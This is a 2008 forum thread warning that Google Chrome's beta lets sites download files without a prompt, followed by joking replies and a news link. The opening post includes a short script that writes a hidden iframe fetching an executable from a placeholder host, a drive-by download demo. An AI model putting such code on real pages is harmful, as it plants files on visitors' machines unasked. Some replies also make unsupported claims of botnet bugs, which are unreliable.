Recommended Posts

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically

downloaded to the user's computer without any user prompt.

Example:

<script>

document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');

</script>

This is just insane. this should be on the news or something, im sure that right now this exploit isnt an hour old, but still. its spreading quick enough.

Careful guys

Edited by Matan Mates
Title edited. Please do not use all Caps. Thanks!
Link to comment
https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/
Share on other sites

im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ

Uh-huh... :rolleyes:

What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn?

Uh-huh... :rolleyes:

What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn?

ehm... no.

but there is a new exploit allowing al qaeda upload anthrax through google chrome and spread it arround infidels now lol

September 2nd, 2008

Google Chrome vulnerable to carpet-bombing flaw

Posted by Ryan Naraine @ 3:05 pm

http://blogs.zdnet.com/security/?p=1843

http://blogs.zdnet.com/security/?p=1843&tag=nl.e539

Why, design looks like lego xD

Just curious, but might your extreme excitement and opinions on this be based in any part on a vast portion of your blog pertaining to Firefox?

lego, pokemon ball, window media player logo...the list goes on.

By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php

Um...did you just create that forum?

Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free.

Just be careful where you browse (which goes for any browser).

Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think?

Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think?

It doesn't say the exe is being executed, it is just being downloaded so some user interaction is still required. Don't get me wrong though, I understand how serious of an issue it is.

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • You could make the argument that K should not be included, but FC, the fried chicken, is not the framework, it's the product. It's the Paint in Paint.NET. A closer analogy is if KFC included the name of the deep fryer they used. HennyPennyFC.
    • Flying as the central point eh... As a massive Spyro fan who has replayed the Reignited Trilogy three times and the originals 4 times... I have some doubts, but maybe...
    • Apple is expanding Private Cloud Compute beyond its own data centers by Pradeep Viswanathan At WWDC 2026, as part of the improved Apple Intelligence capabilities, Apple today announced that it is expanding Private Cloud Compute (PCC), its privacy-focused cloud infrastructure for Apple Intelligence, beyond its own data centers for the first time. Private Cloud Compute was designed to handle Apple Intelligence requests that are too complex to run fully on-device. The PCC system does not store user data and does not allow Apple or anyone else to access user requests. Last year, Apple also expanded its Security Bounty program with rewards of up to $1 million for researchers who could find serious vulnerabilities in PCC. Until now, Apple's PCC data centers were using Apple's own silicon. As part of the expansion, Apple is working with Google and NVIDIA to run new Apple Intelligence workloads on Google Cloud systems powered by NVIDIA GPUs. Apple will be using this new infrastructure to execute more demanding AI tasks while maintaining the same privacy and security guarantees of PCC. The new implementation uses NVIDIA Confidential Computing with NVIDIA GPUs, Intel CPUs with TDX, and Google’s Titan chip. Apple says it has worked with Google to build additional protections beyond a traditional confidential computing deployment. Despite the expansion to third-party data centers, Apple claims that its core PCC requirements remain unchanged, including stateless computation, no privileged runtime access, non-targetability, and verifiable transparency. The company highlighted that it will continue to control the PCC software stack, and Apple devices will only trust PCC software that has been cryptographically approved by Apple. To take security to the next level, Apple mentioned that it is maintaining an append-only ledger of Google Cloud hardware that is part of the PCC fleet. The company claims this will help reduce the risk of supply chain attacks. In addition to AI infrastructure, Apple also worked with Google to use technologies behind the Gemini family of models to build the next generation of Apple Foundation Models to power Apple Intelligence features across on-device and cloud workloads. As expected, for more demanding AI tasks like agentic tool use and complex reasoning, Apple will rely on the expanded PCC infrastructure running on Google Cloud. The expansion of PCC on Google Cloud will gradually ramp toward the full set of protections during the summer preview period. As before, Apple will also publish binaries for public inspection, provide research tooling, and give researchers access to live PCC nodes in research mode through the Apple Security Bounty Program.
    • my problem with outlook (new) is that it connects only to outlook.com. all connections to external providers goes through there. Got your mail server and want to use imap directly? no way... it adds a connector on outlook.com. last bug; if your email on an external provider if the same as principal email of your microsoft account, it doesn't work...
    • It's the only reason I finally have an iPhone (for work) and enjoy using it so much that I'm tempted to move from android next time I need to replace my own device
  • Recent Achievements

    • Very Popular
      Captain_Eric earned a badge
      Very Popular
    • One Month Later
      amusc earned a badge
      One Month Later
    • One Month Later
      DJC50PLUS earned a badge
      One Month Later
    • Week One Done
      DJC50PLUS earned a badge
      Week One Done
    • Proficient
      Eric Biran went up a rank
      Proficient
  • Popular Contributors

    1. 1
      +primortal
      506
    2. 2
      PsYcHoKiLLa
      222
    3. 3
      ATLien_0
      92
    4. 4
      +Edouard
      86
    5. 5
      Steven P.
      81
  • Tell a friend

    Love Neowin? Tell a friend!